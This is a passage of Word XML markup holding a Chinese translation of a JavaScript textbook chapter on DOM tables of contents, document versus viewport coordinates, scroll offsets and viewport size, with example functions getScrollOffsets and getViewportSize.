    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return sects;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化一个数组来保持跟踪章节号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sectionNumbers=[0,0,0,0,0,0];//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，循环已找到的标题元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>h=0;h</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>headings.length;h++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var heading=headings[h];//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过在</w:t>
      </w:r>
      <w:r>
        <w:t>TOC</w:t>
      </w:r>
      <w:r>
        <w:t>容器中的标题元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(heading.parentNode==toc)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>判定标题的级别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var level=parseInt(heading.tagName.charAt(1));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isNaN(level)||level</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>1||level</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>对于该标题级别增加</w:t>
      </w:r>
      <w:r>
        <w:t>sectionNumbers</w:t>
      </w:r>
      <w:r>
        <w:t>对应的数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>重置所有标题比它级别低的数字为零</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ectionNumbers[level-1]++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=level;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>6;i++)sectionNumbers[i]=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，将所有标题级别的章节号组合产生一个章节号，如</w:t>
      </w:r>
      <w:r>
        <w:t>2.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sectionNumber=sectionNumbers.slice(0,level).join(".")//</w:t>
      </w:r>
      <w:r>
        <w:t>为标题级别增加章节号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>把数字放在＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，使得其可以用样式修饰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var span=document.createElement("span");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>span.className="</w:t>
      </w:r>
      <w:r>
        <w:t>TOCSectNum";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>span.innerHTML=sectionNumber;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>heading.insertBefore(span,heading.firstChild);//</w:t>
      </w:r>
      <w:r>
        <w:t>用命名的锚点将标题包起来，以便为它增加链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var anchor=document.createElement("a");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>anchor.name="TOC"+sectionNumber;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>heading.parentNode.insertBefore(anchor,heading);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>anchor.appendChild(heading);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在为该节创建一个链接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var link=document.createElement("a");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.href="#TOC"+sectionNumber;//</w:t>
      </w:r>
      <w:r>
        <w:t>链接的目标地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>link.innerHTML=heading.innerHTML;//</w:t>
      </w:r>
      <w:r>
        <w:t>链接文本与实际标题一致</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将链接放在一个</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>用基于级别名字的样式修饰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var entry=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.className="TOCEntry TOCLevel"+level;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.appendChild(link);//</w:t>
      </w:r>
      <w:r>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>TOC</w:t>
      </w:r>
      <w:r>
        <w:t>容器中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toc.appendChild(entry);</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379" w:name="15_8_Wen_Dang_He_Yuan_Su_De_Ji_He_Xing_Z"/>
      <w:r>
        <w:t>15.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文档和元素的几何形状和滚动</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本章中，到目前为止我们考虑的文档被看做是元素和文本节点的抽象树。但是当浏览器在窗口中渲染文档时，它创建文档的一个视觉表现层，在那里每个元素有自己的位置和尺寸。通常，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序可以将文档看做是元素的树，并且不用关心在屏幕上这些元素是如何渲染的</w:t>
      </w:r>
      <w:r>
        <w:t>。但有时，判定一个元素精确的几个形状也是非常有必要的。例如，将在第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章中看到利用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>为元素指定位置。如果想用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动态定位一个元素（如工具提示或插图）到某个已经由浏览器定位后的普通元素的旁边，首先需要判定那个元素的当前位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本节阐述了在浏览器窗口中完成文档的布局以后，怎样才能在抽象的基于树的文档模型与几何形状的基于坐标的视图之间来回变换。本节描述的属性和方法已经在浏览器中实现了有相当长的一段时间了（虽然有些是</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>特有的，有些直到</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>才实现）。在写本书的这段时间里，它们通过了</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>的标准化流程，作为</w:t>
      </w:r>
      <w:r>
        <w:t>CSSOM-View</w:t>
      </w:r>
      <w:r>
        <w:t>模块（参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/cssom-view/</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="380" w:name="15_8_1_Wen_Dang_Zuo_Biao_He_Shi_Kou_Zuo_"/>
      <w:r>
        <w:t>15.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文档坐标和视口坐标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="380"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素的位置是以像素来度量的，向右代表</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标的增加，向下代表</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标的增加。但是，有两个不同的点作为坐标系的原点：元素的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标可以相对于文档的左上角或者相对于在其中显示文档的视口的左上角。在顶级窗口和标签页中，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>视口</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>只是实际显示文档内容的浏览器的一部分：它不包括浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>外壳</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（如菜单、工具条和标签页）。针对框架页中显示的文档，视口是定义了框架页的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。无论在</w:t>
      </w:r>
      <w:r>
        <w:t>何种情况下，当讨论元素的位置时，必须弄清楚所使用的坐标是文档坐标还是视口坐标。（注意，视口坐标有时也叫做窗口坐标。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果文档比视口要小，或者说它还未出现滚动，则文档的左上角就是视口的左上角，文档和视口坐标系统是同一个。但是，一般</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>来说，要在两种坐标系之间互相转换，必须加上或减去滚动的偏移量（</w:t>
      </w:r>
      <w:r>
        <w:t>scrol l offset</w:t>
      </w:r>
      <w:r>
        <w:t>）。例如，在文档坐标中如果一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标是</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>像素，并且用户已经把浏览器向下滚动</w:t>
      </w:r>
      <w:r>
        <w:t>75</w:t>
      </w:r>
      <w:r>
        <w:t>像素，那么视口坐标中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标是</w:t>
      </w:r>
      <w:r>
        <w:t>125</w:t>
      </w:r>
      <w:r>
        <w:t>像素。同样，在视口坐标中如果一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标是</w:t>
      </w:r>
      <w:r>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:t>像素，并且用</w:t>
      </w:r>
      <w:r>
        <w:t>户已经水平滚动了视口</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>像素，那么文档坐标中元素的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标是</w:t>
      </w:r>
      <w:r>
        <w:t>600</w:t>
      </w:r>
      <w:r>
        <w:t>像素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档坐标比视口坐标更加基础，并且在用户滚动时它们不会发生变化。不过，在客户端编程中使用视口坐标是非常常见的。当使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>指定元素的位置时运用了文档坐标（见第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章）。但是，最简单的查询元素位置的方法（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）返回视口坐标中的位置。类似地，当为鼠标事件注册事件处理程序函数时，报告的鼠标指针的坐标是在视口坐标系中的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了在坐标系之间互相转换，我们需要判定浏览器窗口的滚动条的位置。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>pageXOffset</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pag</w:t>
      </w:r>
      <w:r>
        <w:t>eYOffset</w:t>
      </w:r>
      <w:r>
        <w:t>属性在所有的浏览器中提供这些值，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本以外。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>（和所有现代浏览器）也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获得滚动条的位置。令人迷惑的是，正常情况下通过查询文档的根节点（</w:t>
      </w:r>
      <w:r>
        <w:t>document.documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>）来获取这些属性值，但在怪异模式下（见</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13.4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），必须在文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（</w:t>
      </w:r>
      <w:r>
        <w:t>document.body</w:t>
      </w:r>
      <w:r>
        <w:t>）上查询它们。例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>显示了如何简便地查询滚动条的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>：查询窗口滚动条的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以一个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>属性的方式返</w:t>
      </w:r>
      <w:r>
        <w:t>回滚动条的偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getScrollOffsets(w){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用指定的窗口，如果不带参数则使用当前窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=w||window;//</w:t>
      </w:r>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本以外，其他浏览器都能用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(w.pageXOffset!=null)return{x:w.pageXOffset,y:w.pageYOffset};//</w:t>
      </w:r>
      <w:r>
        <w:t>对标准模式下的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何浏览器）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=w.document;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.compatMode=="CSS1Compat")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{x:d.docume</w:t>
      </w:r>
      <w:r>
        <w:t>ntElement.scrollLeft,y:d.documentElement.scrollTop};//</w:t>
      </w:r>
      <w:r>
        <w:t>对怪异模式下的浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{x:d.body.scrollLeft,y:d.body.scrollTop};</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有时能够判定视口的尺寸也是非常有用的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>例如，为了确定文档的哪些部分是当前可见的。利用滚动偏移量查询视口尺寸的简单方法在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中无法工作，而且该技术在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的运行方式还要取决于浏览器是处于怪异模式还是标准模式。例</w:t>
      </w:r>
      <w:r>
        <w:t>15-9</w:t>
      </w:r>
      <w:r>
        <w:t>介绍了如何简便地查询视口尺寸。注意，它和例</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>-8</w:t>
      </w:r>
      <w:r>
        <w:t>的代码是如此相似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-9</w:t>
      </w:r>
      <w:r>
        <w:t>：查询窗口的视口尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>属性返回视口的尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getViewportSize(w){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用指定的窗口，如果不带参数则使用当前窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=w||window;//</w:t>
      </w:r>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本以外，其他浏览器都能用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(w.innerWidth!=null)return{w:w.innerWidth,h:w.innerHeight};//</w:t>
      </w:r>
      <w:r>
        <w:t>对标准模式下的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何浏览器）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=w.document;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(document.compatMode=="CSS1Compat")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{w:d.documentElement.clientWidth,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>h:d.documentElement.clientHeight};//</w:t>
      </w:r>
      <w:r>
        <w:t>对怪异模式下的浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{w:d.body.clientWidth,h:d.body.clientWidth};</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上述两个例子已经用到了</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>clientWidth</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clientHeight</w:t>
      </w:r>
      <w:r>
        <w:t>属性。我们将在</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中再次遇到这些</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="15_8_2_Cha_Xun_Yuan_Su_De_Ji_He_Chi_Cun_"/>
      <w:r>
        <w:t>15.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询元素的几何尺寸</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判定一个元素的尺寸和位置最简单的方法是调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。该方法是在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 5</w:t>
      </w:r>
      <w:r>
        <w:t>中引入的，而现在当前的所有浏览器都实现了。它不需要参数，返回一个有</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
